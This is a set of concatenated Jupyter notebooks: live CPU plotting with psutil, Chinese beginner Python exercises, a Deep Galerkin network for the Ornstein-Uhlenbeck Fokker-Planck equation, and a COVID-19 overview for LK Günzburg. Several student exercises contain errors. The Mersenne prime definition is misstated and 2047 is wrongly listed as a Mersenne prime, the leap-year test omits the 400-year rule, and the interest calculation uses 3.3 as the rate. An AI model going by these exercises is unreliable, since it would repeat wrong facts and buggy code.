file_list = drive.ListFile({'q': "'1zAxvLd2KQiOcZXma3nMaeUehQ_JiSJFy' in parents and trashed=false"}).GetList()
for file in file_list:
print('Title: %s, ID: %s' % (file['title'], file['id']))
# Get the folder ID that you want
if(file['title'] == "To Share"):
fileID = file['id']
fileID
###Output
_____no_output_____ |
notebook/Unit2-B-Live_Plotting.ipynb | ###Markdown
Live Updating PlotsIn our work, We are often required to **plot Live** data. * **psutil**: Cross-platform lib for process and system monitoring in Python https://github.com/giampaolo/psutil```textpython -m pip install psutil``` 1 Python Script* ```matplotlib.pyplot.ion()``` Turn the **interactive** mode on. https://matplotlib.org/api/_as_gen/matplotlib.pyplot.ion.html?highlight=ion* ```matplotlib.pyplot.clf()``` Clear the current figure. https://matplotlib.org/api/_as_gen/matplotlib.pyplot.clf.html
###Code
%%file ./code/python/cpu_monitor.py
import psutil
from time import sleep, strftime
import matplotlib.pyplot as plt
pltLength = 100
#Turn the interactive mode on.
plt.ion()
# index
x = [i for i in range(pltLength)]
# value
y = [None for i in range(pltLength)]
i = 0
def write_cpu(cpu):
with open("./data/cpu.csv", "a") as log:
log.write("{0},{1}\n".format(strftime("%Y-%m-%d %H:%M:%S"), str(cpu)))
def graph(cpu):
global i
if i < pltLength:
y[i] = cpu
i += 1
else:
# Once enough data is captured, append the newest data point and delete the oldest
y.append(cpu)
del y[0]
# clear the current figure.
plt.clf()
plt.xlim(0, pltLength)
plt.plot(x, y, "b-o")
plt.draw()
plt.pause(0.1)
while True:
cpu = psutil.cpu_percent()
write_cpu(cpu)
graph(cpu)
sleep(1)
###Output
_____no_output_____
###Markdown
2 Jupyter notebook The Dynamically Plotting with `%matplotlib notebook`* `%matplotlib notebook` will lead to `interactive plots` embedded within the notebook
###Code
%matplotlib notebook
import matplotlib.pyplot as plt
import numpy as np
from time import sleep, strftime
import psutil
fig = plt.figure(figsize=(7,3))
plt.ion()
fig.show()
fig.canvas.draw()
pltLength=20
x = [i for i in range(pltLength)]
y = [None for i in range(pltLength)]
i = 0
def write_cpu(cpu):
with open("./data/cpu.csv", "a") as log:
log.write("{0},{1}\n".format(strftime("%Y-%m-%d %H:%M:%S"), str(cpu)))
def graph(cpu):
global i
if i < pltLength:
y[i] = cpu
i += 1
else:
# Once enough data is captured, append the newest data point and delete the oldest
y.append(cpu)
del y[0]
plt.clf()
plt.xlim(0, pltLength)
plt.plot(x, y, "b-o")
plt.show()
fig.canvas.draw() # draw
while True:
cpu = psutil.cpu_percent()
write_cpu(cpu)
graph(cpu)
sleep(1)
###Output
_____no_output_____ |
python01.ipynb | ###Markdown
1、封装:同一功能放在一起 2、继承:主页面一个接口,子页面继承主页面 3、python中有:要缩进一个tab 4、在Python中所有的函数都有返回值,如果没有给予return则默认返回出None,如果给予返回值则返回给予的值。 5、导入一个库:import+库名 6、for循环,如果是计数的情况则使用:range(start,end,[step]) range区间是一个前闭后开的区间,start可取,end不可取。
###Code
a='rrr'
print(a)
#输入一个数字返回这个数字的平方
def su(x):
return x**2
print(su(343530))
#进度条
import time
def s():
for i in range(1,101):
#沉睡一秒
time.sleep(1)
#格式化输出%-->%();%d后接整型;%f后接浮点型;%s后接字符串。
#{}-->format(),他可以直接传入任何类型,然后格式化输出
# \r 回到顶点
#print控制台打印1、end以什么方式结尾,默认一换行符“\n”.2、flush刷新缓冲区
print('%s%d%%\r'%('#'*i,i),end="",flush='true')
s()
#俩参数相加相减相乘相除
class a(object):
#def __init__(self)初始化自己
def __init__(self,m,n):
#多个结果打印用“,”分隔
print(m-n,m+n,m*n,m/n)
a(4,3)
#传参
class student(object):
def __init__(self,name):
print(name)
student(100)
#输入一个年龄,如果大于18可观看爱情片,小于18只能看动画片
class p(object):
def __init__(self,age):
if age>=18:
print("可看爱情片")
else:
print("看动画片")
p(17)
#输入一个年龄,如果大于20小于50可观看爱情片,小于20大于18看四级,大于50不要看了
class x(object):
def __init__(self,age):
if 18<=age<=20 :
print("看书")
elif 20<age<=50:
print("ok")
elif age<18:
print("dhp")
else:
print("no")
x(51)
#共享
class Name(object):
def __init__(self,num):
self.a=num
def func1(self):
print(self.a)
def func2(self):
print('hello')
name=Name(100)
name.func1()
name.func2()
#判断年龄和性别
class l(object):
def __init__(self,age,gener):
self.age=age
self.gener=gener
def Age(self):
if self.age<=18:
print("青年")
elif 18<self.age<=40:
print("中年")
else:
print("老年")
def Gener(self):
if self.gener==0:
print("性别男")
elif self.gener==1:
print("性别女")
else:
print("无法识别")
L=l(7,1)
L.Age()
L.Gener()
class A(object):
def __init__(self,a):
self.a=a
def B(self,b):
self.b=b
print(b)
def c(self):
print(self.b)
w=A(2)
w.B(1)
w.c()
#判断一个数是否是素数
class Name(object):
def __init__(self,num):
self.num=num
def Check(self):
#检查代码
for i in range(2,self.num):
if self.num % i==0:
print('不是素数')
break
else:
print('是素数')
name=Name(6)
name.Check()
#随机选择
import numpy as np
res =np.random.choice(['典韦','赵云','鲁班'])
print(res)
###Output
_____no_output_____
###Markdown
homework 王者荣耀习题
###Code
import time
import numpy as np
class wz(object):
def __init__(self,entry):
self.entry=entry
def jm(self):
self.entry= input('对战模式:人机对战or多人对战')
print(self.entry)
def rw(self):
figure= input('请选择人物:典韦,赵云,鲁班')
if figure== '典韦':
print(figure,":战力--1500,防御--1647")
elif figure == '赵云':
print(figure,":战力--1700,防御--1541")
else:
print(figure,":战力--253,防御--876")
def sj(self):
res =np.random.choice(['典韦','赵云','鲁班'])
if res== '典韦':
print(res,":战力--1500,防御--1647")
elif res == '赵云':
print (res,":战力--1700,防御--1541")
else:
print(res,":战力--253,防御--876")
def start(self):
b=input("请输入开始")
print('进入加载.......')
def s(self):
for i in range(1,3):
time.sleep(1)
print('%s%d%%\r'%('#'*i,i),end="",flush='true')
WZ=wz('人机')
WZ.jm()
WZ.rw()
WZ.sj()
WZ.start()
WZ.s()
print('加载失败,不建议玩,学习吧')
###Output
对战模式:人机对战or多人对战e
e
请选择人物:典韦,赵云,鲁班e
e :战力--253,防御--876
赵云 :战力--1700,防御--1541
请输入开始e
进入加载.......
加载失败,不建议玩,学习吧
###Markdown
第一题(数学方面:五角数)一个五角数被定义为n(3n-1)/2,编写一个测试程序使用这个函数显示前100个五角数,每行显示10个
###Code
def getPentagona1Number(n):
c=int(n*(3*n-1)/2)
print(c,end="\t")#\t制表符
if n % 10==0:
print()
for i in range(1,101):
getPentagona1Number(i)
###Output
1 5 12 22 35 51 70 92 117 145
176 210 247 287 330 376 425 477 532 590
651 715 782 852 925 1001 1080 1162 1247 1335
1426 1520 1617 1717 1820 1926 2035 2147 2262 2380
2501 2625 2752 2882 3015 3151 3290 3432 3577 3725
3876 4030 4187 4347 4510 4676 4845 5017 5192 5370
5551 5735 5922 6112 6305 6501 6700 6902 7107 7315
7526 7740 7957 8177 8400 8626 8855 9087 9322 9560
9801 10045 10292 10542 10795 11051 11310 11572 11837 12105
12376 12650 12927 13207 13490 13776 14065 14357 14652 14950
###Markdown
第二题(求一个整数各个数字的和)
###Code
def sumDigits(n):
#str将括号中的内容强制转换为字符串
str_=str(n)
int_ = 0
for i in str_:
int_ += int(i)#int_ =int_+int(i)
print(int_)
sumDigits(345)
###Output
12
###Markdown
第三题(对三个数排序)提醒用户输入三个整数,然后调用函数按升序显示三个数
###Code
def displaySortedNumber(num1,num2,num3):
nums = [num1,num2,num3]
nums.sort()#排序,默认以升序,reverse:翻转
print(nums)
displaySortedNumber(3,2,1)
###Output
[1, 2, 3]
###Markdown
第四题(财务应用程序,计算未来投资值)编写一个程序提示用户输入投资额和百分比格式的年利率,然后输出一份表格显示年份从1到30年的未来值。
###Code
def futureTnvestmentValue(investmentAmount,monthlyInterestRate,years):
years = years+1
for i in range(1,years):
income = investmentAmount+monthlyInterestRate*investmentAmount
print(i,income)
investmentAmount=income
futureTnvestmentValue(20000,3.3,30)
###Output
1 86000.0
2 369800.0
3 1590140.0
4 6837602.0
5 29401688.599999998
6 126427260.97999997
7 543637222.2139999
8 2337640055.5201993
9 10051852238.736856
10 43222964626.56848
11 185858747894.24448
12 799192615945.2512
13 3436528248564.58
14 14777071468827.693
15 63541407315959.08
16 273228051458624.0
17 1174880621272083.0
18 5051986671469956.0
19 2.172354268732081e+16
20 9.341123355547947e+16
21 4.016683042885617e+17
22 1.7271737084408154e+18
23 7.426846946295506e+18
24 3.193544186907067e+19
25 1.3732240003700389e+20
26 5.904863201591166e+20
27 2.539091176684201e+21
28 1.0918092059742065e+22
29 4.694779585689088e+22
30 2.0187552218463076e+23
###Markdown
第五题(显示字符)打印ch1到ch2之间的字符,按每行指定某个数来打印。编写一个测试程序,打印“1”到“Z”的字符,每行打印10个
###Code
def printChar(ch1,ch2,numberPerLine):
a=ord(ch1)+1
b=ord(ch2)
n=0
for i in range(a,b):
n=n+1
if n%numberPerLine !=0:
print(chr(i),end=" ")
else:
print(chr(i))
printChar('1','Z',10)
###Output
2 3 4 5 6 7 8 9 : ;
< = > ? @ A B C D E
F G H I J K L M N O
P Q R S T U V W X Y
###Markdown
第六题(一年的天数)编写一个程序测试,显示从2010年到2020年每年的天数
###Code
def numberOfDaysInAYear(year):
for i in range(2010,2021):
if i % 4 == 0 and i%100 != 0:
print(i , '年',':366天')
else:
print(i , '年',':365天')
numberOfDaysInAYear(2)
###Output
2010 年 :365天
2011 年 :365天
2012 年 :366天
2013 年 :365天
2014 年 :365天
2015 年 :365天
2016 年 :366天
2017 年 :365天
2018 年 :365天
2019 年 :365天
2020 年 :366天
###Markdown
第七题(几何问题:显示角)计算两点间距离
###Code
import math
def distance(x1,y1,x2,y2):
d1 = x1 - x2
d2 = y1 - y2
#计算两点之间的距离
distance = math.sqrt(d1**2 + d2**2)
print(distance)
distance(2,5,8,7)
###Output
6.324555320336759
###Markdown
第八题(梅森素数)如果一个素数可以写成2^(P-1)的形式,其中p是某个正整数,那么这个数就被称作梅森素数。编写程序找出p<=31的梅森素数。
###Code
def ms(p):
a=pow(2,p)-1
b=2
if p==2:
print(p,a)
for i in range(2,p):
b=b+1
if p%i==0:
break
if b == p:
print(p,a)
for p in range(1,32):
ms(p)
###Output
2 3
3 7
5 31
7 127
11 2047
13 8191
17 131071
19 524287
23 8388607
29 536870911
31 2147483647
###Markdown
第九题(当前时间和日期)调用time.time()返回1970年1月1日0点开始的毫秒数。编写程序显示日期和时间。
###Code
import time
print(time.time())
time = time.localtime(time.time())
print("Cuurrent date and time is",time.tm_year,"年",
time.tm_mon,"月",time.tm_mday,"日",
time.tm_hour,":",time.tm_min,":",time.tm_sec)
###Output
1565178865.372978
Cuurrent date and time is 2019 年 8 月 7 日 19 : 54 : 25
###Markdown
第十题(游戏:掷色子)
###Code
import numpy as np
def ds():
res1 = np.random.choice([1,2,3,4,5,6])
print("您第一次抛出的点数为:",res1)
res2 = np.random.choice([1,2,3,4,5,6])
print("您第二次抛出的点数为:",res2)
res = res1 + res2
print("您抛出的两次点数之和为:",res)
return res
res = ds()
if res==2 or res==3 or res==12:
print("你输了!!!")
elif res==7 or res==11:
print("你赢了!!!")
else:
res3 = res
res = ds()
if res ==7 or res == res3:
print("你赢了!!!")
else:
print("请开始下一局!")
###Output
您第一次抛出的点数为: 6
您第二次抛出的点数为: 1
您抛出的两次点数之和为: 7
你赢了!!!
|
DGM/DGM_Ornstein_Uhlenbeck_P.ipynb | ###Markdown
Deep Galerkin Network and parameter initialization
###Code
# SCRIPT FOR SOLVING THE FOKKER-PLANCK EQUATION FOR ORNSTEIN-UHLENBECK PROCESS
# WITH RANDOM (NORMALLY DISTRIBUTED) STARTING VALUE (see p.54)
#%% import needed packages
%tensorflow_version 1.x
import tensorflow as tf
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
#%% Parameters
class LSTMLayer(tf.keras.layers.Layer):
# constructor/initializer function (automatically called when new instance of class is created)
def __init__(self, output_dim, input_dim, trans1 = "tanh", trans2 = "tanh"):
'''
Args:
input_dim (int): dimensionality of input data
output_dim (int): number of outputs for LSTM layers
trans1, trans2 (str): activation functions used inside the layer;
one of: "tanh" (default), "relu" or "sigmoid"
Returns: customized Keras layer object used as intermediate layers in DGM
'''
# create an instance of a Layer object (call initialize function of superclass of LSTMLayer)
super(LSTMLayer, self).__init__()
# add properties for layer including activation functions used inside the layer
self.output_dim = output_dim
self.input_dim = input_dim
if trans1 == "tanh":
self.trans1 = tf.nn.tanh
elif trans1 == "relu":
self.trans1 = tf.nn.relu
elif trans1 == "sigmoid":
self.trans1 = tf.nn.sigmoid
if trans2 == "tanh":
self.trans2 = tf.nn.tanh
elif trans2 == "relu":
self.trans2 = tf.nn.relu
elif trans2 == "sigmoid":
self.trans2 = tf.nn.relu
### define LSTM layer parameters (use Xavier initialization)
# u vectors (weighting vectors for inputs original inputs x)
self.Uz = self.add_variable("Uz", shape=[self.input_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Ug = self.add_variable("Ug", shape=[self.input_dim ,self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Ur = self.add_variable("Ur", shape=[self.input_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Uh = self.add_variable("Uh", shape=[self.input_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
# w vectors (weighting vectors for output of previous layer)
self.Wz = self.add_variable("Wz", shape=[self.output_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Wg = self.add_variable("Wg", shape=[self.output_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Wr = self.add_variable("Wr", shape=[self.output_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Wh = self.add_variable("Wh", shape=[self.output_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
# bias vectors
self.bz = self.add_variable("bz", shape=[1, self.output_dim])
self.bg = self.add_variable("bg", shape=[1, self.output_dim])
self.br = self.add_variable("br", shape=[1, self.output_dim])
self.bh = self.add_variable("bh", shape=[1, self.output_dim])
# main function to be called
def call(self, S, X):
'''Compute output of a LSTMLayer for a given inputs S,X .
Args:
S: output of previous layer
X: data input
Returns: customized Keras layer object used as intermediate layers in DGM
'''
# compute components of LSTM layer output (note H uses a separate activation function)
Z = self.trans1(tf.add(tf.add(tf.matmul(X,self.Uz), tf.matmul(S,self.Wz)), self.bz))
G = self.trans1(tf.add(tf.add(tf.matmul(X,self.Ug), tf.matmul(S, self.Wg)), self.bg))
R = self.trans1(tf.add(tf.add(tf.matmul(X,self.Ur), tf.matmul(S, self.Wr)), self.br))
H = self.trans2(tf.add(tf.add(tf.matmul(X,self.Uh), tf.matmul(tf.multiply(S, R), self.Wh)), self.bh))
# compute LSTM layer output
S_new = tf.add(tf.multiply(tf.subtract(tf.ones_like(G), G), H), tf.multiply(Z,S))
return S_new
#%% Fully connected (dense) layer - modification of Keras layer class
class DenseLayer(tf.keras.layers.Layer):
# constructor/initializer function (automatically called when new instance of class is created)
def __init__(self, output_dim, input_dim, transformation=None):
'''
Args:
input_dim: dimensionality of input data
output_dim: number of outputs for dense layer
transformation: activation function used inside the layer; using
None is equivalent to the identity map
Returns: customized Keras (fully connected) layer object
'''
# create an instance of a Layer object (call initialize function of superclass of DenseLayer)
super(DenseLayer,self).__init__()
self.output_dim = output_dim
self.input_dim = input_dim
### define dense layer parameters (use Xavier initialization)
# w vectors (weighting vectors for output of previous layer)
self.W = self.add_variable("W", shape=[self.input_dim, self.output_dim], initializer = tf.contrib.layers.xavier_initializer())
# bias vectors
self.b = self.add_variable("b", shape=[1, self.output_dim])
if transformation:
if transformation == "tanh":
self.transformation = tf.tanh
elif transformation == "relu":
self.transformation = tf.nn.relu
else:
self.transformation = transformation
# main function to be called
def call(self,X):
'''Compute output of a dense layer for a given input X
Args:
X: input to layer
'''
# compute dense layer output
S = tf.add(tf.matmul(X, self.W), self.b)
if self.transformation:
S = self.transformation(S)
return S
#%% Neural network architecture used in DGM - modification of Keras Model class
class DGMNet(tf.keras.Model):
# constructor/initializer function (automatically called when new instance of class is created)
def __init__(self, layer_width, n_layers, input_dim, final_trans=None):
'''
Args:
layer_width:
n_layers: number of intermediate LSTM layers
input_dim: spaital dimension of input data (EXCLUDES time dimension)
final_trans: transformation used in final layer
Returns: customized Keras model object representing DGM neural network
'''
# create an instance of a Model object (call initialize function of superclass of DGMNet)
super(DGMNet,self).__init__()
# define initial layer as fully connected
# NOTE: to account for time inputs we use input_dim+1 as the input dimensionality
self.initial_layer = DenseLayer(layer_width, input_dim+1, transformation = "tanh")
# define intermediate LSTM layers
self.n_layers = n_layers
self.LSTMLayerList = []
for _ in range(self.n_layers):
self.LSTMLayerList.append(LSTMLayer(layer_width, input_dim+1))
# define final layer as fully connected with a single output (function value)
self.final_layer = DenseLayer(1, layer_width, transformation = final_trans)
# main function to be called
def call(self,t,x):
'''
Args:
t: sampled time inputs
x: sampled space inputs
Run the DGM model and obtain fitted function value at the inputs (t,x)
'''
# define input vector as time-space pairs
X = tf.concat([t,x],1)
# call initial layer
S = self.initial_layer.call(X)
# call intermediate LSTM layers
for i in range(self.n_layers):
S = self.LSTMLayerList[i].call(S,X)
# call final LSTM layers
result = self.final_layer.call(S)
return result
# OU process parameters
kappa = 0.5 # mean reversion rate
theta = 0.0 # mean reversion level
sigma = 2 # volatility
# mean and standard deviation for (normally distributed) process starting value
alpha = 0.0
beta = 0.9
# terminal time
T = 1.0
# bounds of sampling region for space dimension, i.e. sampling will be done on
# [multiplier*Xlow, multiplier*Xhigh]
Xlow = -4.0
Xhigh = 4.0
x_multiplier = 2.0
t_multiplier = 1.5
# neural network parameters
num_layers = 2
nodes_per_layer = 50
learning_rate = 0.001
# Training parameters
sampling_stages = 100 # number of times to resample new time-space domain points
steps_per_sample = 10 # number of SGD steps to take before re-sampling
# Sampling parameters
nSim_t = 5
nSim_x_interior = 50
nSim_x_initial = 50
# Save options
saveOutput = False
saveName = 'FokkerPlanck'
saveFigure = False
figureName = 'fokkerPlanck_density.png'
###Output
_____no_output_____
###Markdown
Ornstein-Uhlenbeck process: $dX_t=\kappa(\theta-X_t)dt+\sigma dW_t$ $X_0 \sim N(0,\nu)$Initial condition is approximating a Dirac Delta $(\delta_x)$ at time = t $P(X_T|x_0) \text{ follows a Normal distribution}$ $X_T|\{X_0=x_0\} \sim N(x_0e^{-\kappa (T-t)}+\theta(1-e^{-\kappa(T-t)}),\frac{\sigma^2}{2\kappa}(1-e^{-2\kappa(T-t)}))$Given a fixed starting point, the distribution is normal. HnceNOTE: $t$ is the start time, in our case it's $0$
###Code
#%% OU Simulation function
from scipy.stats import norm
def PDF_OU(X, X0, theta, kappa, sigma, T):
''' Simulate end point of Ornstein-Uhlenbeck process with normally
distributed random starting value.
Args:
theta: mean reversion level
kappa: mean reversion rate
sigma: volatility
T: terminal time
'''
# simulate initial point based on normal distributio
# mean and variance of OU endpoint
m = theta + (X0 - theta) * np.exp(-kappa * T)
s = np.sqrt(sigma**2 / (2 * kappa) * (1 - np.exp(-2*kappa*T)))
# simulate endpoint
#print(s)
pdf = norm.pdf(X,m,s)
return pdf
#%% OU Simulation function
def simulateOU_GaussianStart(alpha, beta, theta, kappa, sigma, nSim, T):
''' Simulate end point of Ornstein-Uhlenbeck process with normally
distributed random starting value.
Args:
alpha: mean of random starting value
beta: standard deviation of random starting value
theta: mean reversion level
kappa: mean reversion rate
sigma: volatility
nSim: number of simulations
T: terminal time
'''
# simulate initial point based on normal distribution
X0 = np.random.normal(loc = alpha, scale = beta, size = nSim)
# mean and variance of OU endpoint
m = theta + (X0 - theta) * np.exp(-kappa * T)
s = np.sqrt(sigma**2 / (2 * kappa) * (1 - np.exp(-2*kappa*T)))
# simulate endpoint
X_T = np.random.normal(m,s, nSim)
return X_T
#%% Sampling function - randomly sample time-space pairs
def sampler(nSim_t, nSim_x_interior, nSim_x_initial):
''' Sample time-space points from the function's domain; points are sampled
uniformly on the interior of the domain, at the initial/terminal time points
and along the spatial boundary at different time points.
Args:
nSim_t: number of (interior) time points to sample
nSim_x_interior: number of space points in the interior of the function's domain to sample
nSim_x_initial: number of space points at initial time to sample (initial condition)
'''
# Sampler #1: domain interior
t = np.random.uniform(low=0, high=T*t_multiplier, size=[nSim_t, 1])
x_interior = np.random.uniform(low=Xlow, high=Xhigh, size=[nSim_x_interior, 1])
# Sampler #2: spatial boundary
# no spatial boundary condition for this problem
x_boundary = Xlow + np.random.binomial(1, 0.5, [nSim_x_interior, 1])*(Xhigh-Xlow)
# Sampler #3: initial/terminal condition
x_initial = np.random.uniform(low=Xlow, high=Xhigh, size = [nSim_x_initial, 1])
return t, x_interior, x_boundary, x_initial
###Output
_____no_output_____
###Markdown
A transformation is applied to get a better approximation of the pdf $p(t,x)=\frac{e^{-u(t,x)}}{c(t)}$$c(t)$ is basically a normalizing constant and we take it as $\int e^{-u(t,x)}dx$
###Code
#%% Loss function for Fokker-Planck equation
import tensorflow_probability as tfp
tfd = tfp.distributions
def loss(model, t, x_interior, x_boundary, x_initial, nSim_t, alpha, beta):
''' Compute total loss for training.
NOTE: the loss is based on the PDE satisfied by the negative-exponential
of the density and NOT the density itself, i.e. the u(t,x) in
p(t,x) = exp(-u(t,x)) / c(t)
where p is the density and c is the normalization constant
Args:
model: DGM model object
t: sampled (interior) time points
x_interior: sampled space points in the interior of the function's domain
x_initial: sampled space points at initial time
nSim_t: number of (interior) time points sampled (size of t)
alpha: mean of normal distribution for process starting value
beta: standard deviation of normal distribution for process starting value
'''
# Loss term #1: PDE
# initialize vector of losses
losses_u = []
# for each simulated interior time point
for tIndex in range(nSim_t):
# make vector of current time point to align with simulated interior space points
curr_t = t[tIndex]
t_vector = curr_t * tf.ones_like(x_interior)
# compute function value and derivatives at current sampled points
p = model(t_vector, x_interior)
p_t = tf.gradients(p, t_vector)[0]
drift_x = tf.gradients(kappa*(theta-x_interior)*p, x_interior)[0]
diffusion_x = tf.gradients((sigma**2)*p, x_interior)[0]
diffusion_xx = tf.gradients(diffusion_x, x_interior)[0]
#p_t = tf.gradients(p, t_vector)[0]
#p_x = tf.gradients(p, x_interior)[0]
#p_xx = tf.gradients(p_x, x_interior)[0]
# psi function: normalized and exponentiated neural network
# note: sums are used to approximate integrals (importance sampling)
#psi_denominator = tf.reduce_sum(tf.exp(-u))
#psi = tf.reduce_sum( u_t*tf.exp(-u) ) / psi_denominator
# PDE differential operator
# NOTE: EQUATION IN DOCUMENT IS INCORRECT - EQUATION HERE IS CORRECT
#diff_f = -u_t - kappa + kappa*(x_interior- theta)*u_x - 0.5*sigma**2*(-u_xx + u_x**2) + psi
#diff_f = p_t - kappa*p - kappa*(x_interior - theta)*p_x - (sigma**2/2)*p_xx
diff_f = p_t + drift_x - 0.5 * diffusion_xx
# compute L2-norm of differential operator and attach to vector of losses
currLoss = tf.reduce_mean(tf.square(diff_f))
losses_u.append(currLoss)
# average losses across sample time points
L1 = tf.add_n(losses_u) / nSim_t
# Loss term #2: boundary condition
# no boundary condition for this problem
losses_u = []
for tIndex in range(nSim_t):
# make vector of current time point to align with simulated interior space points
curr_t = t[tIndex]
t_vector = curr_t * tf.ones_like(x_interior)
# compute function value and derivatives at current sampled points
p = model(t_vector, x_boundary)
p_x = tf.gradients(p, x_boundary)[0]
# psi function: normalized and exponentiated neural network
# note: sums are used to approximate integrals (importance sampling)
#psi_denominator = tf.reduce_sum(tf.exp(-u))
#psi = tf.reduce_sum( u_t*tf.exp(-u) ) / psi_denominator
# PDE differential operator
# NOTE: EQUATION IN DOCUMENT IS INCORRECT - EQUATION HERE IS CORRECT
#diff_f = -u_t - kappa + kappa*(x_interior- theta)*u_x - 0.5*sigma**2*(-u_xx + u_x**2) + psi
diff_f = tf.concat([p,p_x],0)
# compute L2-norm of differential operator and attach to vector of losses
currLoss = tf.reduce_mean(tf.square(diff_f))
losses_u.append(currLoss)
L2 = tf.add_n(losses_u) / nSim_t
# Loss term #3: initial condition
# compute negative-exponential of neural network-implied pdf at t = 0
# i.e. the u in p = e^[-u(t,x)] / c(t)
fitted_pdf = model(0*tf.ones_like(x_initial), x_initial)
# target pdf - normally distributed starting value
dist = tfd.Normal(loc=alpha, scale=beta)
target_pdf = dist.prob(x_initial)
# average L2 error for initial distribution
L3 = tf.reduce_mean(tf.square(fitted_pdf - target_pdf))
return L1, L2, L3
#%% Set up network
# initialize DGM model (last input: space dimension = 1)
model = DGMNet(nodes_per_layer, num_layers, 1)
# tensor placeholders (_tnsr suffix indicates tensors)
# inputs (time, space domain interior, space domain at initial time)
t_tnsr = tf.placeholder(tf.float32, [None,1])
x_interior_tnsr = tf.placeholder(tf.float32, [None,1])
x_boundary_tnsr = tf.placeholder(tf.float32, [None,1])
x_initial_tnsr = tf.placeholder(tf.float32, [None,1])
# loss
L1_tnsr, L2_tnsr, L3_tnsr = loss(model, t_tnsr, x_interior_tnsr, x_boundary_tnsr, x_initial_tnsr, nSim_t, alpha, beta)
loss_tnsr = L1_tnsr + L2_tnsr + L3_tnsr
# UNNORMALIZED density
p = model(t_tnsr, x_interior_tnsr)
# set optimizer
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss_tnsr)
# initialize variables
init_op = tf.global_variables_initializer()
# open session
sess = tf.Session()
sess.run(init_op)
#%% Train network
# for each sampling stage
for i in range(sampling_stages):
# sample uniformly from the required regions
t, x_interior, x_boundary, x_initial = sampler(nSim_t, nSim_x_interior, nSim_x_initial)
# for a given sample, take the required number of SGD steps
for j in range(steps_per_sample):
loss,L1,L2,L3,_ = sess.run([loss_tnsr, L1_tnsr, L2_tnsr, L3_tnsr, optimizer],
feed_dict = {t_tnsr:t, x_interior_tnsr:x_interior, x_boundary_tnsr:x_boundary, x_initial_tnsr:x_initial})
print(loss, L1, L2, L3, i)
# save outout
if saveOutput:
saver = tf.train.Saver()
saver.save(sess, './SavedNets/' + saveName)
plt.figure()
plt.figure(figsize = (20,14))
# time values at which to examine density
densityTimes = [0.0, 0.33*T, 0.66*T, T]
# vector of x values for plotting
x_plot = np.linspace(Xlow, Xhigh, 1000)
for i, curr_t in enumerate(densityTimes):
# specify subplot
plt.subplot(2,2,i+1)
# simulate process at current t
sim_x = simulateOU_GaussianStart(alpha, beta, theta, kappa, sigma, 10000, curr_t)
pdf = PDF_OU(x_plot, alpha, theta, kappa, sigma, curr_t)
# compute normalized density at all x values to plot and current t value
t_plot = curr_t * np.ones_like(x_plot.reshape(-1,1))
density = sess.run([p], feed_dict= {t_tnsr:t_plot, x_interior_tnsr:x_plot.reshape(-1,1)})
#density = unnorm_dens[0] / sp.integrate.simps(unnorm_dens[0].reshape(x_plot.shape), x_plot)
density = np.reshape(density,(-1,))
# plot histogram of simulated process values and overlay estimated density
plt.hist(sim_x, bins=40, density=True, color = 'b', label='Histogram of the posterior')
plt.plot(x_plot, pdf, 'r', linewidth=2.5, label='true distribution')
plt.plot(x_plot, density, '--k', linewidth=2.5, label='estimated distribution')
# subplot options
plt.xlabel(r"x", fontsize=15, labelpad=10)
plt.ylabel(r"p(t,x)", fontsize=15, labelpad=20)
plt.title(r"t = %.2f"%(curr_t), fontsize=18, y=1.03)
plt.xticks(fontsize=13)
plt.yticks(fontsize=13)
plt.suptitle("Ornstein-Uhlenbeck Process")
plt.legend(fontsize=10, loc='upper right')
# adjust space between subplots
plt.subplots_adjust(wspace=0.3, hspace=0.4)
if saveFigure:
plt.savefig(figureName)
###Output
/usr/local/lib/python3.7/dist-packages/scipy/stats/_distn_infrastructure.py:1740: RuntimeWarning: divide by zero encountered in true_divide
x = np.asarray((x - loc)/scale, dtype=dtyp)
|
ipynb/Germany-Bayern-LK-Günzburg.ipynb | ###Markdown
Germany: LK Günzburg (Bayern)* Homepage of project: https://oscovida.github.io* Plots are explained at http://oscovida.github.io/plots.html* [Execute this Jupyter Notebook using myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Germany-Bayern-LK-Günzburg.ipynb)
###Code
import datetime
import time
start = datetime.datetime.now()
print(f"Notebook executed on: {start.strftime('%d/%m/%Y %H:%M:%S%Z')} {time.tzname[time.daylight]}")
%config InlineBackend.figure_formats = ['svg']
from oscovida import *
overview(country="Germany", subregion="LK Günzburg", weeks=5);
overview(country="Germany", subregion="LK Günzburg");
compare_plot(country="Germany", subregion="LK Günzburg", dates="2020-03-15:");
# load the data
cases, deaths = germany_get_region(landkreis="LK Günzburg")
# get population of the region for future normalisation:
inhabitants = population(country="Germany", subregion="LK Günzburg")
print(f'Population of country="Germany", subregion="LK Günzburg": {inhabitants} people')
# compose into one table
table = compose_dataframe_summary(cases, deaths)
# show tables with up to 1000 rows
pd.set_option("max_rows", 1000)
# display the table
table
###Output
_____no_output_____
###Markdown
Explore the data in your web browser- If you want to execute this notebook, [click here to use myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Germany-Bayern-LK-Günzburg.ipynb)- and wait (~1 to 2 minutes)- Then press SHIFT+RETURN to advance code cell to code cell- See http://jupyter.org for more details on how to use Jupyter Notebook Acknowledgements:- Johns Hopkins University provides data for countries- Robert Koch Institute provides data for within Germany- Atlo Team for gathering and providing data from Hungary (https://atlo.team/koronamonitor/)- Open source and scientific computing community for the data tools- Github for hosting repository and html files- Project Jupyter for the Notebook and binder service- The H2020 project Photon and Neutron Open Science Cloud ([PaNOSC](https://www.panosc.eu/))--------------------
###Code
print(f"Download of data from Johns Hopkins university: cases at {fetch_cases_last_execution()} and "
f"deaths at {fetch_deaths_last_execution()}.")
# to force a fresh download of data, run "clear_cache()"
print(f"Notebook execution took: {datetime.datetime.now()-start}")
###Output
_____no_output_____ |
tensorflow/timeseries_forecasting_exercises/forex_multivariate_forecasting.ipynb | ###Markdown
